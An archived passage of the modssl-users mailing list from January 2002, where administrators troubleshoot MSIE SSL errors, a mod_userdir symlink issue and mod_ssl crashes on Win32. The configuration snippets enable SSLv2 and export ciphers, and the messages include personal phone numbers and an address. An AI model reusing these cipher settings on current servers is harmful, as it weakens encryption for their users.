create the errors. > > I am determined to squash this thing but I do not know where to go next. > > I have included the following information below: > > * SYSTEM INFORMATION > * CONFIGURATION INFORMATION > * BROWSER VERSION INFORMATION > * CERTIFICATE STATISTICS FROM THE BROWSER > > Any help or further direction would be greatly appreciated! > > Sincerely, > > Christopher Taranto > > > SYSTEM INFORMATION: > =================== > > I am running Red Hat 6.2 on a Pentinum III using: > > * mod_ssl-2.8.5-1.3.22 > * openssl-0.9.6b > * mm-1.1.3 > > > CONFIGURATION INFORMATION: > ========================== > > > > AddType application/x-x509-ca-cert .crt > AddType application/x-pkcs7-crl .crl > > SSLPassPhraseDialog builtin > > # I have also tried dbm but there was no difference > SSLSessionCache > shm:/usr/local/apache/logs/ssl_gcache_data(512000) > SSLSessionCacheTimeout 300 > > SSLMutex file:logs/ssl_mutex > > SSLRandomSeed startup builtin > SSLRandomSeed connect builtin > > SSLLog logs/ssl_engine_log > SSLLogLevel info > > > > > > > > SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP > > BrowserMatch "MSIE [1-4]" nokeepalive \ > ssl-unclean-shutdown \ > downgrade-1.0 \ > force-response-1.0 > > BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown > > BrowserMatch "Mozilla/4..*PC)" nokeepalive \ > downgrade-1.0 \ > force-response-1.0 > > > > > > > BROWSER VERSION INFORMATION > =================================== > > MSIE 5.00.2614.3500 > Cipher Strength: 40-bit > > > CERTIFICATE STATS FROM THE BROWSER > =================================== > > My certificate was generated using 1024 bits. > > Version: V3 > Serial Number: 5A55 3FAD EB43 6649 7F8B 39BB 1D33 6DE1 > Signature Algorithm: md5RSA > Public Key: 3081 8902 8181 00BD D63A 500D 0FE0 CCA2 E7BB 804B 53DA E4CE > 9F51 3D54 93A3 5D2E FC0E E3E2 7046 1EFF 6826 BB30 B8DC 4903 9A32 345F E769 > 31D7 D313 6ECD 62BD 2CBE C070 AFD5 C1C8 9920 7442 5E44 2AED 7878 A566 DD3A > 3445 0612 919A 0B74 2F6A E806 080F C7E7 9C68 7FAC 51D3 4EA9 0BC3 ABAF 27D2 > 2C95 0A09 CD12 61B3 4DF2 0A88 1379 7552 5B1C D4CE 9F02 0301 0001 > Basic Constraints: Subject Type=End Entity > Path Length Constraint=None > Key Usage: Digital Signature, Key Encipherment(A0) > > [1]CRL Distribution Point > Distribution Point Name: > Full Name: > URL=http://crl.verisign.com/RSASecureServer.crl > > [1]Certificate Policy: > PolicyIdentifier=2.16.840.1.113733.1.7.1.1 > [1,1]Policy Qualifier Info: > Policy Qualifier Id=1.3.6.1.5.5.7.2.1 > Qualifier=161C 6874 7470 733A 2F2F 7777 772E 7665 7269 7369 676E > 2E63 6F6D 2F43 5053 > [1,2]Policy Qualifier Info: > Policy Qualifier Id=1.3.6.1.5.5.7.2.2 > Qualifier=3056 3015 160E 5665 7269 5369 676E 2C20 496E 632E 3003 > 0201 011A 3D56 6572 6953 6967 6E27 7320 4350 5320 696E 636F 7270 2E20 6279 > 2072 6566 6572 656E 6365 206C 6961 622E 206C 7464 2E20 2863 2939 3720 5665 > 7269 5369 676E > > Server Authentication(1.3.6.1.5.5.7.3.1) > Client Authentication(1.3.6.1.5.5.7.3.2) > > 2.16.840.1.113733.1.6.15: > 16 09 39 32 36 30 32 32 ..926022 > 34 32 37 427 > > Authority Information Access: [1]Authority Info Access > AccessMethod=On-line Certificate Status Protocol(1.3.6.1.5.5.7.48.1) > Alternative Name: > URL=http://ocsp.verisign.com > > Thumbprint Algorithm: sha1 > Thumbprint: CC1C DD7D BE05 C813 F119 813B 86E6 5717 5583 F981 > > > > > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 19:15:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA10215; Fri, 18 Jan 2002 19:14:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.ecomserver.com id TAA10190; Fri, 18 Jan 2002 19:13:19 +0100 (MET) Received: from mail.ecomserver.com ([127.0.0.1]) by mail.ecomserver.com (Netscape Messaging Server 4.15) with ESMTP id GQ5CHY00.VV3 for ; Fri, 18 Jan 2002 13:25:10 -0500 From: "Rajidhar Etta" To: modssl-users@modssl.org Message-ID: Date: Fri, 18 Jan 2002 13:25:10 -0500 X-Mailer: Netscape Webmail MIME-Version: 1.0 Content-Language: en Subject: Re: RE: MSIE + "The page cannot be displayed" error X-Accept-Language: en Content-Type: multipart/mixed; boundary="--1aea30fb16154b27" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Rajidhar Etta" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ----1aea30fb16154b27 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: 7bit If no one is doing it now, then one of us has to start. I am also facing the same problem from our project's helpdesk/support teams. First of all I am getting conflicting feedback about using 'nokeepalive' for IE requests. mod_ssl FAQ asks to do this, but Oracle support says not do it (one of the Oracle customer confirmed that after removing 'nokeepalive', the no. reduced drastically). But for me, there isn't much difference, I keep getting the same no.of errors with and without 'nokeepalive'. Thanks Rajidhar Etta ----- Original Message ----- From: "Julian C. Dunn" Date: Friday, January 18, 2002 11:24 am Subject: RE: MSIE + "The page cannot be displayed" error > I am wondering if someone is keeping a list of working versus non- > workingversions of IE, and if not, whether one could be started. I > am running into > this issue as well, and my support department keeps harrassing me > to come up > with better solutions to tell the users other than "Use Netscape". > > Thank you Christopher for providing a non-working version number; > does anyone > know of a version # of IE which does work reliably? > > - Julian > > On 18-Jan-2002 Christopher Taranto wrote: > > > > > Fortunately (for my sanity), I have one of non-working versions > of the MSIE > > browsers (5.00.2614.3500) on one of the machines in my office so > I can > > repeatedly create the errors. > > > > -- > Julian C. Dunn, B.A.Sc. > Senior Software Developer, VerticalScope Inc. > 111 Peter St., Suite 700, Toronto, ON > Tel: (416) 341-8950 x236 Fax: (416) 341-8959 > > istream >> ostream >> "We all scream for ice cream"; > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ----1aea30fb16154b27 Content-Type: text/x-vcard; name="retta.vcf"; charset=us-ascii Content-Disposition: attachment; filename="retta.vc" Content-Description: Card for Rajidhar Etta Content-Transfer-Encoding: 7bit begin:vcard n:Etta;Rajidhar fn:Rajidhar Etta tel;cell:609.203.3697 tel;fax:(888) 979-8800 tel;home:(609) 750-0836 tel;work:(609) 951-8500 x192 org:eComServer Inc;ACB adr:;;Princeton Executive Campus, 4301, Route 1, South Suite 220,;Monmouth Junction;NJ;08852;United States of America version:2.1 email;internet:retta@ecomserver.com title:Software Engineer end:vcard ----1aea30fb16154b27-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 20:03:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA12239; Fri, 18 Jan 2002 20:02:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id UAA12199; Fri, 18 Jan 2002 20:01:17 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16Re1m-0007Bo-00 for ; Fri, 18 Jan 2002 10:46:14 -0800 Date: Fri, 18 Jan 2002 10:46:14 -0800 To: modssl-users@modssl.org Subject: Re: Apache + mod_ssl bug? Message-ID: <20020118184614.GA27338@squaretrade.com> References: <20020117173136.A76952@mail.texas-shooters.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020117173136.A76952@mail.texas-shooters.com> User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users when you recompiled apache, did you get mod_userdir installed? to httpd -l, and you should see something like: # ./httpd -l Compiled-in modules: http_core.c mod_env.c mod_log_config.c mod_mime.c mod_negotiation.c mod_status.c mod_include.c mod_autoindex.c mod_dir.c mod_cgi.c mod_asis.c mod_imap.c mod_actions.c mod_userdir.c mod_alias.c mod_access.c mod_auth.c mod_setenvif.c if it's compiled as DSO, you should know what to do. Also, check your config-- http://httpd.apache.org/docs/mod/mod_userdir.html -g On Thu, Jan 17, 2002 at 05:31:36PM -0600, pr0ject wrote: > I recently installed Apache 1.3.22 + mod_ssl to give my users > SSL capabilities... > > Unfortunately by doing so, it broke the /~user web space. > > I went back, reconfigured like it should be (uncommented the basic Directory > container for the public_html options..) > > Restarted apachessl with no errors. Yet, when viewing the userspace, I get > a forbidden error. > > The logs tell me the following: > > [Thu Jan 17 17:37:23 2002] [error] [client] Symbolic link not allowed: /home/ > > The ONLY fix I have found for this so far (have been testing variations of the > conf file all day!!) has been to allow the top level directory > to have the Options FollowSymLinks. > > My platform is FreeBSD 4.4-Release with Apache+mod_ssl+php... since FreeBSD > symlinks /usr/home to /home, I assume this is where the problems begin. > > FYI: I have explicitly assigned the user directory container to /usr/home/*/ > public_html with the same error occuring. > > Is this an Apache issue? Or maybe an SSL/Apache issue? > > Anyone ever have this problem? I'm at a loss at this point.... > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 21:48:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA16877; Fri, 18 Jan 2002 21:47:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.texas-shooters.com id VAA16848; Fri, 18 Jan 2002 21:46:32 +0100 (MET) Received: from mail.texas-shooters.com (localhost [127.0.0.1]) by mail.texas-shooters.com (8.12.1/8.12.1) with ESMTP id g0IKdrEk032643 for ; Fri, 18 Jan 2002 14:39:53 -0600 (CST)?g (envelope-from el_kab0ng@mail.texas-shooters.com) Received: (from el_kab0ng@localhost) by mail.texas-shooters.com (8.12.1/8.12.1/Submit) id g0IKdrKt032642 for modssl-users@modssl.org; Fri, 18 Jan 2002 14:39:53 -0600 (CST)?g (envelope-from el_kab0ng) Date: Fri, 18 Jan 2002 14:39:53 -0600 From: pr0ject To: modssl-users@modssl.org Subject: Re: Apache + mod_ssl bug? Message-ID: <20020118143953.A32481@mail.texas-shooters.com> References: <20020117173136.A76952@mail.texas-shooters.com> <20020118184614.GA27338@squaretrade.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020118184614.GA27338@squaretrade.com>; from glen@squaretrade.com on Fri, Jan 18, 2002 at 10:46:14AM -0800 X-righteous-weapon: AK-47, of course. X-planation: Happiness is a warm gun. X-bitch: I miss my ex-wife... but with this new laser sight... X-website: http://www.texas-shooters.com Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: pr0ject X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users yeah... the mod_userdir.so is compiled in. LoadModule userdir_module libexec/apache/mod_userdir.so AddModule mod_userdir.c Anything else? Today glen@squaretrade.com spoke in tongue: ** when you recompiled apache, did you get mod_userdir installed? ** ** to httpd -l, and you should see something like: ** ** # ./httpd -l ** Compiled-in modules: ** http_core.c ** mod_env.c ** mod_log_config.c ** mod_mime.c ** mod_negotiation.c ** mod_status.c ** mod_include.c ** mod_autoindex.c ** mod_dir.c ** mod_cgi.c ** mod_asis.c ** mod_imap.c ** mod_actions.c ** mod_userdir.c ** mod_alias.c ** mod_access.c ** mod_auth.c ** mod_setenvif.c ** ** ** ** if it's compiled as DSO, you should know what to do. ** ** Also, check your config-- http://httpd.apache.org/docs/mod/mod_userdir.html ** ** -g ** ** On Thu, Jan 17, 2002 at 05:31:36PM -0600, pr0ject wrote: ** > I recently installed Apache 1.3.22 + mod_ssl to give my users ** > SSL capabilities... ** > ** > Unfortunately by doing so, it broke the /~user web space. ** > ** > I went back, reconfigured like it should be (uncommented the basic Directory ** > container for the public_html options..) ** > ** > Restarted apachessl with no errors. Yet, when viewing the userspace, I get ** > a forbidden error. ** > ** > The logs tell me the following: ** > ** > [Thu Jan 17 17:37:23 2002] [error] [client] Symbolic link not allowed: /home/ ** > ** > The ONLY fix I have found for this so far (have been testing variations of the ** > conf file all day!!) has been to allow the top level directory ** > to have the Options FollowSymLinks. ** > ** > My platform is FreeBSD 4.4-Release with Apache+mod_ssl+php... since FreeBSD ** > symlinks /usr/home to /home, I assume this is where the problems begin. ** > ** > FYI: I have explicitly assigned the user directory container to /usr/home/*/ ** > public_html with the same error occuring. ** > ** > Is this an Apache issue? Or maybe an SSL/Apache issue? ** > ** > Anyone ever have this problem? I'm at a loss at this point.... ** > ______________________________________________________________________ ** > Apache Interface to OpenSSL (mod_ssl) www.modssl.org ** > User Support Mailing List modssl-users@modssl.org ** > Automated List Manager majordomo@modssl.org ** ** -- ** Glen S Mehn ** Lead Systems Administrator SquareTrade, Inc ** glen@squaretrade.com Building Trust in Transactions (sm) ** ______________________________________________________________________ ** Apache Interface to OpenSSL (mod_ssl) www.modssl.org ** User Support Mailing List modssl-users@modssl.org ** Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 22:37:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA19029; Fri, 18 Jan 2002 22:36:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from indigo.quadrant.net id WAA19010; Fri, 18 Jan 2002 22:35:51 +0100 (MET) Received: from [192.168.100.1] (gw.marketingden.com [204.83.38.101]) by indigo.quadrant.net (8.9.1/8.9.1) with ESMTP id PAA15149 for ; Fri, 18 Jan 2002 15:35:47 -0600 (CST) User-Agent: Microsoft-Entourage/9.0.1.3108 Date: Fri, 18 Jan 2002 15:35:47 -0600 Subject: Re: MSIE + "The page cannot be displayed" error From: James Hastings-Trew To: Message-ID: In-Reply-To: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: James Hastings-Trew X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am considerably less technically adept than others in this list, but my experience with this issue when first setting up our server leads me to the conclusion that using "nokeepalive" to fix IE problems is ineffectual. The real, only cure, is to use a session cache. But that might just be me. > If no one is doing it now, then one of us has to start. I am also > facing the same problem from our project's helpdesk/support teams. > First of all I am getting conflicting feedback about > using 'nokeepalive' for IE requests. mod_ssl FAQ asks to do this, but > Oracle support says not do it (one of the Oracle customer confirmed > that after removing 'nokeepalive', the no. reduced drastically). But > for me, there isn't much difference, I keep getting the same no.of > errors with and without 'nokeepalive'. > > Thanks > Rajidhar Etta > > > ----- Original Message ----- > From: "Julian C. Dunn" > Date: Friday, January 18, 2002 11:24 am > Subject: RE: MSIE + "The page cannot be displayed" error > >> I am wondering if someone is keeping a list of working versus non- >> workingversions of IE, and if not, whether one could be started. I >> am running into >> this issue as well, and my support department keeps harrassing me >> to come up >> with better solutions to tell the users other than "Use Netscape". >> >> Thank you Christopher for providing a non-working version number; >> does anyone >> know of a version # of IE which does work reliably? >> >> - Julian >> >> On 18-Jan-2002 Christopher Taranto wrote: >> >> >> >>> Fortunately (for my sanity), I have one of non-working versions >> of the MSIE >>> browsers (5.00.2614.3500) on one of the machines in my office so >> I can >>> repeatedly create the errors. >> >> >> >> -- >> Julian C. Dunn, B.A.Sc. >> Senior Software Developer, VerticalScope Inc. >> 111 Peter St., Suite 700, Toronto, ON >> Tel: (416) 341-8950 x236 Fax: (416) 341-8959 >> >> istream >> ostream >> "We all scream for ice cream"; >> ______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> User Support Mailing List modssl-users@modssl.org >> Automated List Manager majordomo@modssl.org >> > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 22:46:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA19365; Fri, 18 Jan 2002 22:45:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chrome.verticalscope.com id WAA19328; Fri, 18 Jan 2002 22:44:30 +0100 (MET) Received: from jedi.verticalscope.com (dhcp116.office.verticalscope.com [10.10.10.116]) by chrome.verticalscope.com (Postfix) with ESMTP id 017E0CC962 for ; Fri, 18 Jan 2002 16:49:07 -0500 (EST) Received: by jedi.verticalscope.com (Postfix, from userid 533) id 967B719B4; Fri, 18 Jan 2002 16:44:23 -0500 (EST) Message-ID: X-Mailer: XFMail 1.5.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: X-Base: are belong to us. move zig for great justice. Date: Fri, 18 Jan 2002 16:44:23 -0500 (EST) X-Face: %*.F!K#`0&;M^0AiDH.>-twy^j2[V{11:%R@6A~sj26H$^}7B[ez9tB`&D'j-?}eX%;o|YO zn1jl&;})pyN.}i.gv~S>>u%=={3PJMI3.pcaQ0l#E.S0(xHJKhmW#]CMP}ue"&PsW=q&Tl8C&g)AT ;<9dD2"Z|$El To: modssl-users@modssl.org Subject: Re: MSIE + "The page cannot be displayed" error Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 18-Jan-2002 James Hastings-Trew wrote: > I am considerably less technically adept than others in this list, but my > experience with this issue when first setting up our server leads me to the > conclusion that using "nokeepalive" to fix IE problems is ineffectual. The > real, only cure, is to use a session cache. But that might just be me. I am also using a session cache, as in SSLSessionCache shm:/usr/local/apache/logs/ssl_scache(512000) but I am still getting the errors from IE. So that also seems to be rather ineffective. - Julian -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 istream >> ostream >> "We all scream for ice cream"; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 23:04:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA20085; Fri, 18 Jan 2002 23:03:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from indigo.quadrant.net id XAA20055; Fri, 18 Jan 2002 23:02:19 +0100 (MET) Received: from [192.168.100.1] (gw.marketingden.com [204.83.38.101]) by indigo.quadrant.net (8.9.1/8.9.1) with ESMTP id QAA19189 for ; Fri, 18 Jan 2002 16:02:16 -0600 (CST) User-Agent: Microsoft-Entourage/9.0.1.3108 Date: Fri, 18 Jan 2002 16:02:16 -0600 Subject: Re: MSIE + "The page cannot be displayed" error From: James Hastings-Trew To: Message-ID: In-Reply-To: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: James Hastings-Trew X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users My httpd.conf file has this: SSLSessionCache dbm:/var/cache/httpd/ssl_cache SSLSessionCacheTimeout 300 In addition to this: SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 And this: SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP My server accepts SSL connections with all clients I have tried and have received no complaints from users. Your mileage may vary. > On 18-Jan-2002 James Hastings-Trew wrote: >> I am considerably less technically adept than others in this list, but my >> experience with this issue when first setting up our server leads me to the >> conclusion that using "nokeepalive" to fix IE problems is ineffectual. The >> real, only cure, is to use a session cache. But that might just be me. > > I am also using a session cache, as in > > SSLSessionCache shm:/usr/local/apache/logs/ssl_scache(512000) > > but I am still getting the errors from IE. So that also seems to be rather > ineffective. > > - Julian ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 19 03:34:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA02223; Sat, 19 Jan 2002 03:33:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from VL-MS-MR004.sc1.videotron.ca id DAA02192; Sat, 19 Jan 2002 03:32:14 +0100 (MET) Received: from shodan2 ([24.200.91.45]) by VL-MS-MR004.sc1.videotron.ca (Netscape Messaging Server 4.15) with ESMTP id GQ5Z1O01.OGU for ; Fri, 18 Jan 2002 21:32:12 -0500 From: "Enrico Demarin" To: Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) Date: Fri, 18 Jan 2002 21:32:16 -0800 Message-ID: <001b01c1a0aa$a7fb3ff0$0340a8c0@shodan2> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <4.2.2.20020117155858.00ad2b10@mail.got.net> Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Enrico Demarin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi all, 1) I recompiled Openssl ( the "ms" option ) just to be sure. 2) I recompiled Apache 1.3.22 + mod_ssl 2.8.5 from scratch, no patches, release build 3) I set KeepAlive Off in the httpd.conf Result: Havy refreshing doesn't cause an halt. 4) I re-enabled KeepAlive On Heavy refreshing causes apache to crash. - Enrico -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Leo Baschy Sent: January 17, 2002 4:05 PM To: modssl-users@modssl.org Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) If you indeed refresh then that would be on the same connection and threading would not be involved if it is a page by itself in one file (i.e. without images, without frames). Important detail: Are you refreshing a single resource (file)? If not, then please test that simplified case. Knowing that helps pinpoint the problem. Is there different behavior if you allow keeping alive connection or forcing not to keep alive? (Do that from the configuration file.) Do you known whether it keeps alive? (There must be some way to log that, maybe you have to recompile specifically for that, maybe there is a configuration option, I'm not sure.) - Leo At 06:13 PM 1/17/02 -0800, you wrote: >Well I became aware of the problem when I started refreshing an ssl >page very fast from localhost... So I guess the load doesn't have to be >-that- high to reproduce the problem. I agree there must be some >problem in the threading code. I tried apache 2.0 with mod_ssl but I >couldn't get it to work on win32. It would be interesting if the people >involved in the porting of Apache on Win32 would take the time to write >a sort of "developer howto", (or if it exists already, mail the >pointers to it :) explaining like you said how to debug apache modules >and the apache code itself ( apache modules on win32 are .so objects >while one would expect DLLs for example). > >In my case we will probably solve the problem by (temporarely?) >switching to IIS, but it would be nice to have an alternative to it, >and Apache would be the best alternative to it in my opinion. > >Thanks, >Enrico > >-----Original Message----- >From: owner-modssl-users@modssl.org >[mailto:owner-modssl-users@modssl.org] On Behalf Of nirvana@got.net >Sent: January 17, 2002 2:43 PM >To: modssl-users@modssl.org >Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) > > >Don't have heavy load yet myself, but afraid I will have same problem >on one machine. Here is my thinking from experience with other code: > >Heavy load and Win32 indicates the problem has to do with concurrency >by threading. > >Reasoning: Easy load doesn't cause much concurrency. And under Linux, >as far as I am reading in documentation, most installations run with a >separate process for each connection. So what is unique to heavy load >under Win32 is concurrency by threading instead of by processes. > >Hope that reminder saves someone time in figuring this out. Maybe I'll >get to it later. Also would be interested in hints about how to debug >modules under Win32. > >- Leo > >At 09:30 AM 1/17/02 -0600, you wrote: > >I could have written your email word for word! I've been trying to > >keep Apache/mod_ssl running on WIN32 since early December, and still > >haven't figured out what's wrong. Josef's patch seemed to work for him, > > >but even after applying it, my SSL-enabled Apache only runs a few > >minutes under heavy load before crashing. > > > >As far as getting a debug version built, I've had lots of trouble > >with > >that as well. It seems to build just fine in debug mode in Visual C++, > > >but when I attempt to debug the EXE after a crash, I get no source > >code > > >to trace. > > > >Is there anyone out there successfully running an SSL-enabled version > >of Apache on WIN32? If so, did you have to do anything special? And > >either way, does someone have a write-up explaining how to put together > > >a debug build? > > > >Thanks. > > > >Jay > > > >-----Original Message----- > >From: Enrico Demarin [mailto:enricod@videotron.ca] > >Sent: Thursday, January 17, 2002 12:19 PM > >To: modssl-users@modssl.org > >Subject: mod-ssl on win32 (mod_ssl bug 569, apache crash) > > > >I know it's not supported but... seems like something is still not > >good > > >in mod_ssl , as reported by Josef Goebel, who posted a patch, there > >is > >something odd in mod_ssl for win32. I applied his patch to ap_ctx.c , > >that cures the crash in most of the cases in ap_ctx_get() adds: if > >((ctx==NULL) || (key==NULL)) { > >ap_log_assert("ap_ctx_get_bug: ctx or key are NULL!", > >__FILE__, __LINE__); > >return NULL; > >} > >and i also added the same check in ap_ctx_set. The problem is that >sometimes mod_ssl calls such functions with ctx set to null and key set >to null, and crashes apache. I have had other crashes which i haven't >been able to debug ( how do i properly build a debug version of >apache-ssl on win32 ? when the visual c debug window pops up after a >crash all i can see is assembly code ). As reported by Josef the "null" >calls seem to be generated by ssl_io_suck_read() in ssl_engine_io.c, > >but why does it happen ? is there some memory corruption going inside >mod_ssl that causes the structures to be set to null ? Apache with >aforementioned patch is "almost" stable but... i have the sensation >that there is a problem somewhere else. > >- Enrico > > > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Jan 19 07:58:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA12134; Sat, 19 Jan 2002 07:57:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta7.pltn13.pbi.net id HAA12089; Sat, 19 Jan 2002 07:56:10 +0100 (MET) Received: from christopher.tokpela.com ([63.200.61.35]) by mta7.pltn13.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GQ600GEGB9JRH@mta7.pltn13.pbi.net> for modssl-users@modssl.org; Fri, 18 Jan 2002 22:56:08 -0800 (PST) Date: Fri, 18 Jan 2002 22:53:39 -0800 From: Christopher Taranto Subject: Re[2]: MSIE + "The page cannot be displayed" error In-reply-to: X-Sender: efaqs.com/christopher@opal.he.net To: modssl-users@modssl.org Message-id: <4.3.2.7.2.20020118204918.00c33db0@opal.he.net> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT References: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Christopher Taranto X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users >>My server accepts SSL connections with all clients I have tried and have >>received no complaints from users. Your mileage may vary. What is your URL? Let me look at it with my broken MSIE to see if it fails. Secure connections for me on my site work just fine on my Netscape 4.76 and MSIE Explorer 5.00.2919.6307 (Cipher Strength: 56-bit) browsers. At 04:02 PM 1/18/02 -0600, you wrote: >My httpd.conf file has this: > >SSLSessionCache dbm:/var/cache/httpd/ssl_cache >SSLSessionCacheTimeout 300 > >In addition to this: >SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown >downgrade-1.0 force-response-1.0 > >And this: > >SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP > >My server accepts SSL connections with all clients I have tried and have >received no complaints from users. Your mileage may vary. > > > > On 18-Jan-2002 James Hastings-Trew wrote: > >> I am considerably less technically adept than others in 